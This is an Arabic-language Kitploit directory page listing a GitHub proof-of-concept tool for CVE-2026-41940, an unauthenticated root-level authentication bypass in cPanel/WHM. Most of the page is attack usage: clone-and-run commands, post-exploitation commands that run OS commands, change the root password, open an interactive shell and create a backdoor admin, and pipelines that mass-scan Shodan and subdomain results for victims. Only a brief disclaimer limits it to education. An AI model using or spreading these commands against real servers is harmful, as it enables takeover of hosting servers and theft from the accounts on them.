Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-41940-PoC — يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel/WHM، للحصول على وصول root إلى WHM وتنفيذ أوامر ما بعد الاستغلال، وسرد الحسابات، وجلسات shell تفاعلية. | Kitploit
أدوات/GitHubGitHub/ctdal/cve-2026-41940-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمرأداة الوصول عن بعد
GitHubctdal/cve-2026-41940-poc

cve-2026-41940-PoC

4411منذ 12س 5دلم تتم المراجعة بعد

يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel/WHM، للحصول على وصول root إلى WHM وتنفيذ أوامر ما بعد الاستغلال، وسرد الحسابات، وجلسات shell تفاعلية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940

⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض bug bounty فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للسيطرة.

الوصف

أداة لاستغلال CVE-2026-41940، وهو تجاوز حرج للمصادقة في cPanel & WHM (CVSS 10.0)، يسمح للمهاجمين غير المصادق عليهم بالحصول على وصول WHM بمستوى root عبر حقن تسلسلات CRLF في ملفات الجلسة من جانب الخادم من خلال ترويسة Authorization — دون الحاجة إلى بيانات اعتماد.

كيف يعمل

يُستغل CVE-2026-41940، بعبارات عامة، من خلال خلل في كيفية تعامل النظام مع جلسات المصادقة في cPanel/WHM. يبدأ الهجوم عادةً بطلب عادي إلى واجهة تسجيل الدخول، حيث يقوم التطبيق بتهيئة جلسة قبل التحقق الكامل من بيانات اعتماد المستخدم. وبسبب المعالجة غير السليمة للمدخلات المتعلقة بالجلسة، يمكن لبعض هياكل المدخلات المصممة أو غير المتوقعة أن تغيّر كيفية تخزين بيانات الجلسة أو تفسيرها من قبل الخادم.

الإصدارات المتأثرة

الإصدارقابل للاستغلالمُصحّح
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

التثبيت (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

كيفية الاستخدام

تتوقع الأداة تحديد نطاق هدف.

وضع الهدف الواحد:

root@kitploit:~
python cve.py -u https://target1.com:2083

يمكنك أيضًا الفحص من ملف target.txt (أنشئه):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

الفحص الأساسي:

الأوامر المتاحة:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # فحص هدف واحد
python cve.py info -u https://victim1.com:2083 # استرجاع معلومات النظام (الإصدار، الحمل، استخدام القرص).
python cve.py host -u https://victim1.com:2083 # استرجاع اسم المضيف للخادم الهدف.

إجراءات ما بعد الاستغلال

root@kitploit:~
# سرد جميع الحسابات على الخادم
python cve.py list -u https://target.com:2087

# أمر نظام التشغيل
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# الحصول على معلومات الخادم (اسم المضيف، القرص، مضيف MySQL)
python cve.py info -u https://target.com:2087

# تغيير كلمة مرور root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# صدفة WHM تفاعلية
python cve.py shell -u https://target.com:2087

خطوط الأنابيب

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# من قائمة النطاق
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# نتائج Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# مصادر متعددة مجتمعة
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

وضع صدفة WHM

بعد تنفيذ ناجح، يمكنك فتح صدفة WHM تفاعلية:

root@kitploit:~
python cve.py shell -u

جميع أوامر الصدفة

الأمرالوصف
idعرض معرّف المستخدم
hostnameالحصول على اسم مضيف الخادم
accountsسرد جميع حسابات المستخدمين
infoالحمل، القرص، مضيف MySQL، الإصدار
cat <path>قراءة محتوى ملف
exec <cmd>تنفيذ أمر نظام التشغيل
newadmin <user> <pass>إنشاء مسؤول WHM خلفي
passwd <pass>تغيير كلمة مرور root
l [path]سرد محتويات الدليل
helpعرض جميع الأوامر
exitالخروج من وضع الصدفة

مرجع CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

إخلاء المسؤولية

⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض bug bounty فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للسيطرة.

تنزيل الأداة